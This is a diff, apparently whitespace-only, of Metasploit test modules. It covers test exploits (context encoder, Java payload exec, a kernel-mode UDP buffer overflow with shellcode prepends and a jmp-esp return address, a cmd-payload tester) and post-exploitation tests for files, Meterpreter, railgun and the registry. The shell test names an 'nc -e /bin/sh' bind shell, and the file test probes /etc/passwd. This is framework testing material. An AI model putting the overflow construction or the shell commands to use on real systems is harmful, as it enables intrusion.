#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
sock.put(payload.encoded)
sock.put(payload.encoded)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
test/modules/exploits/test/java_tester.rb
+35 -35
View File
@@ -13,46 +13,46 @@ require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
def initialize( info = {} )
super( update_info( info,
'Name' => 'Exec',
'Description' => %q{ },
'License' => MSF_LICENSE,
'Author' => [ 'egypt' ],
'Version' => '$Revision$',
'References' => [ ],
'Platform' => [ 'java', 'linux' ],
'Arch' => ARCH_JAVA,
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
} ],
[ 'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
} ],
],
'DefaultTarget' => 0
))
def initialize( info = {} )
super( update_info( info,
'Name' => 'Exec',
'Description' => %q{ },
'License' => MSF_LICENSE,
'Author' => [ 'egypt' ],
'Version' => '$Revision$',
'References' => [ ],
'Platform' => [ 'java', 'linux' ],
'Arch' => ARCH_JAVA,
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
} ],
[ 'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
} ],
],
'DefaultTarget' => 0
))
end
end
def exploit
# Equivalent to payload.encoded
@jar_data = payload.encoded_jar.pack
def exploit
# Equivalent to payload.encoded
@jar_data = payload.encoded_jar.pack
File.open("payload.jar", "wb") do |fd|
fd.write(@jar_data)
end
File.open("payload.jar", "wb") do |fd|
fd.write(@jar_data)
end
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
end
test/modules/exploits/test/kernel.rb
+59 -59
View File
@@ -15,74 +15,74 @@ require 'msf/core'
# This is a test exploit for testing kernel-mode payloads.
#
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Kernel-mode Test Exploit',
'Description' =>
"This module tests the exploitation of a kernel-mode test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
},
'Targets' =>
[
[
'Windows XP SP2',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin'
}
}
}
],
],
'DefaultTarget' => 0))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Kernel-mode Test Exploit',
'Description' =>
"This module tests the exploitation of a kernel-mode test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
},
'Targets' =>
[
[
'Windows XP SP2',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin'
}
}
}
],
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
connect_udp
def exploit
connect_udp
print_status("Sending #{payload.encoded.length} byte payload...")
print_status("Sending #{payload.encoded.length} byte payload...")
buf =
rand_text_alphanumeric(260) +
"\xbe\x7f\x00\x00" +
rand_text_alphanumeric(28) +
[target.ret].pack('V') +
rand_text_alphanumeric(8) +
payload.encoded
buf =
rand_text_alphanumeric(260) +
"\xbe\x7f\x00\x00" +
rand_text_alphanumeric(28) +
[target.ret].pack('V') +
rand_text_alphanumeric(8) +
payload.encoded
udp_sock.put(buf)
udp_sock.put(buf)
select(nil,nil,nil,2)
select(nil,nil,nil,2)
disconnect_udp
end
disconnect_udp
end
end
test/modules/exploits/test/shell.rb
+37 -37
View File
@@ -12,49 +12,49 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Test',
'Description' => %q{
This module tests cmd payloads by targeting (for example) a server
like: nc -l -p 31337 -e /bin/sh
},
'Author' => 'egypt',
'Version' => '$Revision$',
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Test',
'Description' => %q{
This module tests cmd payloads by targeting (for example) a server
like: nc -l -p 31337 -e /bin/sh
},
'Author' => 'egypt',
'Version' => '$Revision$',
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(31337),
], self.class)
end
register_options(
[
Opt::RPORT(31337),
], self.class)
end
def autofilter
false
end
def autofilter
false
end
def exploit
connect
def exploit
connect
sock.put(payload.encoded + "\n")
sock.put(payload.encoded + "\n")
handler
end
handler
end
end
test/modules/post/test/file.rb
+124 -124
View File
@@ -8,162 +8,162 @@ require 'module_test'
class Metasploit4 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Common
include Msf::Post::File
include Msf::ModuleTest::PostTest
include Msf::Post::Common
include Msf::Post::File
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote File Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote File Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back
#
def setup
@old_pwd = pwd
tmp = (directory?("/tmp")) ? "/tmp" : "%TMP%"
vprint_status("Setup: changing working directory to #{tmp}")
cd(tmp)
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back
#
def setup
@old_pwd = pwd
tmp = (directory?("/tmp")) ? "/tmp" : "%TMP%"
vprint_status("Setup: changing working directory to #{tmp}")
cd(tmp)
super
end
super
end
def test_file
it "should test for file existence" do
ret = false
[
"c:\\boot.ini",
"c:\\pagefile.sys",
"/etc/passwd",
"/etc/master.passwd"
].each { |path|
ret = true if file?(path)
}
def test_file
it "should test for file existence" do
ret = false
[
"c:\\boot.ini",
"c:\\pagefile.sys",
"/etc/passwd",
"/etc/master.passwd"
].each { |path|
ret = true if file?(path)
}
ret
end
ret
end
it "should test for directory existence" do
ret = false
[
"c:\\",
"/etc/",
"/tmp"
].each { |path|
ret = true if directory?(path)
}
it "should test for directory existence" do
ret = false
[
"c:\\",
"/etc/",
"/tmp"
].each { |path|
ret = true if directory?(path)
}
ret
end
ret
end
it "should create text files" do
write_file("pwned", "foo")
it "should create text files" do
write_file("pwned", "foo")
file?("pwned")
end
file?("pwned")
end
it "should read the text we just wrote" do
f = read_file("pwned")
ret = ("foo" == f)
unless ret
print_error("Didn't read what we wrote, actual file on target: #{f}")
end
it "should read the text we just wrote" do
f = read_file("pwned")
ret = ("foo" == f)
unless ret
print_error("Didn't read what we wrote, actual file on target: #{f}")
end
ret
end
ret
end
it "should append text files" do
ret = true
append_file("pwned", "bar")
it "should append text files" do
ret = true
append_file("pwned", "bar")
ret &&= read_file("pwned") == "foobar"
append_file("pwned", "baz")
final_contents = read_file("pwned")
ret &&= final_contents == "foobarbaz"
unless ret
print_error("Didn't read what we wrote, actual file on target: #{final_contents}")
end
ret &&= read_file("pwned") == "foobar"
append_file("pwned", "baz")
final_contents = read_file("pwned")
ret &&= final_contents == "foobarbaz"
unless ret
print_error("Didn't read what we wrote, actual file on target: #{final_contents}")
end
ret
end
ret
end
it "should delete text files" do
file_rm("pwned")
it "should delete text files" do
file_rm("pwned")
not file_exist?("pwned")
end
not file_exist?("pwned")
end
it "should move files" do
# Make sure we don't have leftovers from a previous run
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
it "should move files" do
# Make sure we don't have leftovers from a previous run
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
# touch a new file
write_file("meterpreter-test", "")
# touch a new file
write_file("meterpreter-test", "")
rename_file("meterpreter-test", "meterpreter-test-moved")
res &&= exist?("meterpreter-test-moved")
res &&= !exist?("meterpreter-test")
rename_file("meterpreter-test", "meterpreter-test-moved")
res &&= exist?("meterpreter-test-moved")
res &&= !exist?("meterpreter-test")
# clean up
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
end
# clean up
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
end
end
end
def test_binary_files
def test_binary_files
#binary_data = ::File.read("/bin/ls")
binary_data = ::File.read("/bin/echo")
#binary_data = "\xff\x00\xff\xfe\xff\`$(echo blha)\`"
it "should write binary data" do
vprint_status "Writing #{binary_data.length} bytes"
t = Time.now
write_file("pwned", binary_data)
vprint_status("Finished in #{Time.now - t}")
#binary_data = ::File.read("/bin/ls")
binary_data = ::File.read("/bin/echo")
#binary_data = "\xff\x00\xff\xfe\xff\`$(echo blha)\`"
it "should write binary data" do
vprint_status "Writing #{binary_data.length} bytes"
t = Time.now
write_file("pwned", binary_data)
vprint_status("Finished in #{Time.now - t}")
file_exist?("pwned")
end
file_exist?("pwned")
end
it "should read the binary data we just wrote" do
bin = read_file("pwned")
vprint_status "Read #{bin.length} bytes"
it "should read the binary data we just wrote" do
bin = read_file("pwned")
vprint_status "Read #{bin.length} bytes"
bin == binary_data
end
bin == binary_data
end
it "should delete binary files" do
file_rm("pwned")
it "should delete binary files" do
file_rm("pwned")
not file_exist?("pwned")
end
not file_exist?("pwned")
end
it "should append binary data" do
write_file("pwned", "\xde\xad")
append_file("pwned", "\xbe\xef")
bin = read_file("pwned")
file_rm("pwned")
it "should append binary data" do
write_file("pwned", "\xde\xad")
append_file("pwned", "\xbe\xef")
bin = read_file("pwned")
file_rm("pwned")
bin == "\xde\xad\xbe\xef"
end
bin == "\xde\xad\xbe\xef"
end
end
end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
cd(@old_pwd)
super
end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
cd(@old_pwd)
super
end
end
test/modules/post/test/meterpreter.rb
+265 -265
View File
@@ -7,336 +7,336 @@ require 'module_test'
class Metasploit4 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::ModuleTest::PostTest
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Meterpreter Stuff',
'Description' => %q{ This module will test meterpreter API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter' ]
))
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Meterpreter Stuff',
'Description' => %q{ This module will test meterpreter API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
end
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back. This method is an implementation
# of post/test/file.rb's method of the same name, but without the Post::File
# dependency.
#
def setup
@old_pwd = session.fs.dir.getwd
stat = session.fs.file.stat("/tmp") rescue nil
if (stat and stat.directory?)
tmp = "/tmp"
else
tmp = session.fs.file.expand_path("%TMP%")
end
vprint_status("Setup: changing working directory to #{tmp}")
session.fs.dir.chdir(tmp)
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back. This method is an implementation
# of post/test/file.rb's method of the same name, but without the Post::File
# dependency.
#
def setup
@old_pwd = session.fs.dir.getwd
stat = session.fs.file.stat("/tmp") rescue nil
if (stat and stat.directory?)
tmp = "/tmp"
else
tmp = session.fs.file.expand_path("%TMP%")
end
vprint_status("Setup: changing working directory to #{tmp}")
session.fs.dir.chdir(tmp)
super
end
super
end
def test_sys_process
vprint_status("Starting process tests")
pid = nil
def test_sys_process
vprint_status("Starting process tests")
pid = nil
if session.commands.include? "stdapi_sys_process_getpid"
it "should return its own process id" do
pid = session.sys.process.getpid
vprint_status("Pid: #{pid}")
true
end
else
print_status("Session doesn't implement getpid, skipping test")
end
if session.commands.include? "stdapi_sys_process_getpid"
it "should return its own process id" do
pid = session.sys.process.getpid
vprint_status("Pid: #{pid}")
true
end
else
print_status("Session doesn't implement getpid, skipping test")
end
it "should return a list of processes" do
ret = true
list = session.sys.process.get_processes
ret &&= (list && list.length > 0)
if session.commands.include? "stdapi_sys_process_getpid"
pid ||= session.sys.process.getpid
process = list.find{ |p| p['pid'] == pid }
vprint_status("PID info: #{process.inspect}")
ret &&= !(process.nil?)
else
vprint_status("Session doesn't implement getpid, skipping sanity check")
end
it "should return a list of processes" do
ret = true
list = session.sys.process.get_processes
ret &&= (list && list.length > 0)
if session.commands.include? "stdapi_sys_process_getpid"
pid ||= session.sys.process.getpid
process = list.find{ |p| p['pid'] == pid }
vprint_status("PID info: #{process.inspect}")
ret &&= !(process.nil?)
else
vprint_status("Session doesn't implement getpid, skipping sanity check")
end
ret
end
ret
end
end
end
def test_sys_config
vprint_status("Starting system config tests")
def test_sys_config
vprint_status("Starting system config tests")
it "should return a user id" do
uid = session.sys.config.getuid
true
end
it "should return a user id" do
uid = session.sys.config.getuid
true
end
it "should return a sysinfo Hash" do
sysinfo = session.sys.config.sysinfo
true
end
end
it "should return a sysinfo Hash" do
sysinfo = session.sys.config.sysinfo
true
end
end
def test_net_config
unless (session.commands.include? "stdapi_net_config_get_interfaces")
vprint_status("This meterpreter does not implement get_interfaces, skipping tests")
return
end
def test_net_config
unless (session.commands.include? "stdapi_net_config_get_interfaces")
vprint_status("This meterpreter does not implement get_interfaces, skipping tests")
return
end
vprint_status("Starting networking tests")
vprint_status("Starting networking tests")
it "should return network interfaces" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
it "should return network interfaces" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
res
end
it "should have an interface that matches session_host" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
res
end
it "should have an interface that matches session_host" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
res &&= !! ifaces.find { |iface|
iface.addrs.find { |addr|
addr == session.session_host
}
}
res &&= !! ifaces.find { |iface|
iface.addrs.find { |addr|
addr == session.session_host
}
}
res
end
res
end
it "should return network routes" do
routes = session.net.config.get_routes
it "should return network routes" do
routes = session.net.config.get_routes
routes and routes.length > 0
end
routes and routes.length > 0
end
end
end
def test_fs
vprint_status("Starting filesystem tests")
def test_fs
vprint_status("Starting filesystem tests")
it "should return the proper directory separator" do
sysinfo = session.sys.config.sysinfo
if sysinfo["OS"] =~ /windows/i
sep = session.fs.file.separator
res = (sep == "\\")
else
sep = session.fs.file.separator
res = (sep == "/")
end
it "should return the proper directory separator" do
sysinfo = session.sys.config.sysinfo
if sysinfo["OS"] =~ /windows/i
sep = session.fs.file.separator
res = (sep == "\\")
else
sep = session.fs.file.separator
res = (sep == "/")
end
res
end
res
end
it "should return the current working directory" do
wd = session.fs.dir.pwd
vprint_status("CWD: #{wd}")
it "should return the current working directory" do
wd = session.fs.dir.pwd
vprint_status("CWD: #{wd}")
true
end
true
end
it "should list files in the current directory" do
session.fs.dir.entries
end
it "should list files in the current directory" do
session.fs.dir.entries
end
it "should stat a directory" do
dir = session.fs.dir.pwd
vprint_status("Current directory: #{dir.inspect}")
s = session.fs.file.stat(dir)
vprint_status("Stat of current directory: #{s.inspect}")
it "should stat a directory" do
dir = session.fs.dir.pwd
vprint_status("Current directory: #{dir.inspect}")
s = session.fs.file.stat(dir)
vprint_status("Stat of current directory: #{s.inspect}")
s.directory?
end
s.directory?
end
it "should create and remove a dir" do
res = create_directory("meterpreter-test")
if (res)
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
end
it "should create and remove a dir" do
res = create_directory("meterpreter-test")
if (res)
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
end
res
end
res
end
it "should change directories" do
res = create_directory("meterpreter-test")
it "should change directories" do
res = create_directory("meterpreter-test")
old_wd = session.fs.dir.pwd
vprint_status("Old CWD: #{old_wd}")
old_wd = session.fs.dir.pwd
vprint_status("Old CWD: #{old_wd}")
if res
session.fs.dir.chdir("meterpreter-test")
new_wd = session.fs.dir.pwd
vprint_status("New CWD: #{new_wd}")
res &&= (new_wd =~ /meterpreter-test$/)
if res
session.fs.dir.chdir("meterpreter-test")
new_wd = session.fs.dir.pwd
vprint_status("New CWD: #{new_wd}")
res &&= (new_wd =~ /meterpreter-test$/)
if res
session.fs.dir.chdir("..")
wd = session.fs.dir.pwd
vprint_status("Back to old CWD: #{wd}")
end
end
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
if res
session.fs.dir.chdir("..")
wd = session.fs.dir.pwd
vprint_status("Back to old CWD: #{wd}")
end
end
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
res
end
res
end
it "should create and remove files" do
res = true
res &&= session.fs.file.open("meterpreter-test", "wb") { |fd|
fd.write("test")
}
it "should create and remove files" do
res = true
res &&= session.fs.file.open("meterpreter-test", "wb") { |fd|
fd.write("test")
}
vprint_status("Wrote to meterpreter-test, checking contents")
res &&= session.fs.file.open("meterpreter-test", "rb") { |fd|
contents = fd.read
vprint_status("Wrote #{contents}")
(contents == "test")
}
vprint_status("Wrote to meterpreter-test, checking contents")
res &&= session.fs.file.open("meterpreter-test", "rb") { |fd|
contents = fd.read
vprint_status("Wrote #{contents}")
(contents == "test")
}
session.fs.file.rm("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
session.fs.file.rm("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
res
end
res
end
it "should upload a file" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
it "should upload a file" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res
fd = session.fs.file.new(remote, "rb")
uploaded_contents = fd.read
until (fd.eof?)
uploaded_contents << fd.read
end
fd.close
original_contents = ::File.read(local)
if res
fd = session.fs.file.new(remote, "rb")
uploaded_contents = fd.read
until (fd.eof?)
uploaded_contents << fd.read
end
fd.close
original_contents = ::File.read(local)
res &&= !!(uploaded_contents == original_contents)
end
res &&= !!(uploaded_contents == original_contents)
end
session.fs.file.rm(remote)
res
end
if session.commands.include?("stdapi_fs_file_move")
it "should move files" do
res = true
session.fs.file.rm(remote)
res
end
if session.commands.include?("stdapi_fs_file_move")
it "should move files" do
res = true
# Make sure we don't have leftovers from a previous run
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
# Make sure we don't have leftovers from a previous run
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
# touch a new file
fd = session.fs.file.open("meterpreter-test", "wb")
fd.close
# touch a new file
fd = session.fs.file.open("meterpreter-test", "wb")
fd.close
session.fs.file.mv("meterpreter-test", "meterpreter-test-moved")
entries = session.fs.dir.entries
res &&= entries.include?("meterpreter-test-moved")
res &&= !entries.include?("meterpreter-test")
session.fs.file.mv("meterpreter-test", "meterpreter-test-moved")
entries = session.fs.dir.entries
res &&= entries.include?("meterpreter-test-moved")
res &&= !entries.include?("meterpreter-test")
# clean up
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
# clean up
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
res
end
end
res
end
end
it "should do md5 and sha1 of files" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
it "should do md5 and sha1 of files" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res
remote_md5 = session.fs.file.md5(remote)
local_md5 = Digest::MD5.digest(::File.read(local))
remote_sha = session.fs.file.sha1(remote)
local_sha = Digest::SHA1.digest(::File.read(local))
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5,'')}")
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5,'')}")
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha,'')}")
vprint_status("local sha : #{Rex::Text.to_hex(local_sha,'')}")
res &&= (remote_md5 == local_md5)
end
if res
remote_md5 = session.fs.file.md5(remote)
local_md5 = Digest::MD5.digest(::File.read(local))
remote_sha = session.fs.file.sha1(remote)
local_sha = Digest::SHA1.digest(::File.read(local))
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5,'')}")
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5,'')}")
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha,'')}")
vprint_status("local sha : #{Rex::Text.to_hex(local_sha,'')}")
res &&= (remote_md5 == local_md5)
end
session.fs.file.rm(remote)
res
end
session.fs.file.rm(remote)
res
end
end
end
=begin
# Sniffer currently crashes on any OS that requires driver signing,
# i.e. everything vista and newer
#
# Disable loading it for now to make it through the rest of the tests.
#
def test_sniffer
begin
session.core.use "sniffer"
rescue
# Not all meterpreters have a sniffer extension, don't count it
# against them.
return
end
# Sniffer currently crashes on any OS that requires driver signing,
# i.e. everything vista and newer
#
# Disable loading it for now to make it through the rest of the tests.
#
def test_sniffer
begin
session.core.use "sniffer"
rescue
# Not all meterpreters have a sniffer extension, don't count it
# against them.
return
end
it "should list interfaces for sniffing" do
session.sniffer.interfaces.kind_of? Array
end
it "should list interfaces for sniffing" do
session.sniffer.interfaces.kind_of? Array
end
# XXX: how do we test this more thoroughly in a generic way?
end
# XXX: how do we test this more thoroughly in a generic way?
end
=end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
session.fs.dir.chdir(@old_pwd)
super
end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
session.fs.dir.chdir(@old_pwd)
super
end
protected
def create_directory(name)
res = true
def create_directory(name)
res = true
session.fs.dir.mkdir(name)
entries = session.fs.dir.entries
res &&= entries.include?(name)
res &&= session.fs.file.stat(name).directory?
if res
vprint_status("Directory created successfully")
end
session.fs.dir.mkdir(name)
entries = session.fs.dir.entries
res &&= entries.include?(name)
res &&= session.fs.file.stat(name).directory?
if res
vprint_status("Directory created successfully")
end
res
end
res
end
end
test/modules/post/test/railgun_reverse_lookups.rb
+60 -60
View File
@@ -15,83 +15,83 @@ require 'module_test'
class Metasploit3 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Railgun
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Railgun
def initialize(info={})
super( update_info( info,
'Name' => 'railgun_testing',
'Description' => %q{ This module will test railgun code used in post modules},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith'],
'Platform' => [ 'windows' ]
))
def initialize(info={})
super( update_info( info,
'Name' => 'railgun_testing',
'Description' => %q{ This module will test railgun code used in post modules},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith'],
'Platform' => [ 'windows' ]
))
register_options(
[
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
], self.class)
register_options(
[
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
], self.class)
end
end
def test_static
def test_static
it "should return a constant name given a const and a filter" do
ret = true
results = select_const_names(4, /^SERVICE/)
it "should return a constant name given a const and a filter" do
ret = true
results = select_const_names(4, /^SERVICE/)
ret &&= !!(results.kind_of? Array)
# All of the returned values should match the filter and have the same value
results.each { |const|
ret &&= !!(const =~ /^SERVICE/)
ret &&= !!(session.railgun.constant_manager.parse(const) == 4)
}
ret &&= !!(results.kind_of? Array)
# All of the returned values should match the filter and have the same value
results.each { |const|
ret &&= !!(const =~ /^SERVICE/)
ret &&= !!(session.railgun.constant_manager.parse(const) == 4)
}
# Should include things that match the filter and the value
ret &&= !!(results.include? "SERVICE_RUNNING")
# Should NOT include things that match the value but not the filter
ret &&= !!(not results.include? "CLONE_FLAG_ENTITY")
# Should include things that match the filter and the value
ret &&= !!(results.include? "SERVICE_RUNNING")
# Should NOT include things that match the value but not the filter
ret &&= !!(not results.include? "CLONE_FLAG_ENTITY")
ret
end
ret
end
it "should return an error string given an error code" do
ret = true
results = lookup_error(0x420, /^ERROR_SERVICE/)
ret &&= !!(results.kind_of? Array)
ret &&= !!(results.length == 1)
it "should return an error string given an error code" do
ret = true
results = lookup_error(0x420, /^ERROR_SERVICE/)
ret &&= !!(results.kind_of? Array)
ret &&= !!(results.length == 1)
ret
end
ret
end
end
end
def test_datastore
def test_datastore
if (datastore["WIN_CONST"])
it "should look up arbitrary constants" do
ret = true
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
if (datastore["WIN_CONST"])
it "should look up arbitrary constants" do
ret = true
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
ret
end
end
ret
end
end
if (datastore["ERR_CODE"])
it "should look up arbitrary error codes" do
ret = true
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.inspect}")
if (datastore["ERR_CODE"])
it "should look up arbitrary error codes" do
ret = true
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.inspect}")
ret
end
end
ret
end
end
end
end
end
test/modules/post/test/registry.rb
+112 -112
View File
@@ -15,141 +15,141 @@ require 'module_test'
class Metasploit3 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Registry
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Registry
def initialize(info={})
super( update_info( info,
'Name' => 'registry_post_testing',
'Description' => %q{ This module will test Post::Windows::Registry API methods },
'License' => MSF_LICENSE,
'Author' => [
'kernelsmith', # original
'egypt', # PostTest conversion
],
'Platform' => [ 'windows' ]
))
end
def initialize(info={})
super( update_info( info,
'Name' => 'registry_post_testing',
'Description' => %q{ This module will test Post::Windows::Registry API methods },
'License' => MSF_LICENSE,
'Author' => [
'kernelsmith', # original
'egypt', # PostTest conversion
],
'Platform' => [ 'windows' ]
))
end
def test_0_registry_read
pending "should evaluate key existence" do
# these methods are not implemented
k_exists = registry_key_exist?(%q#HKCU\Environment#)
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
def test_0_registry_read
pending "should evaluate key existence" do
# these methods are not implemented
k_exists = registry_key_exist?(%q#HKCU\Environment#)
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
(k_exists && !k_dne)
end
(k_exists && !k_dne)
end
pending "should evaluate value existence" do
# these methods are not implemented
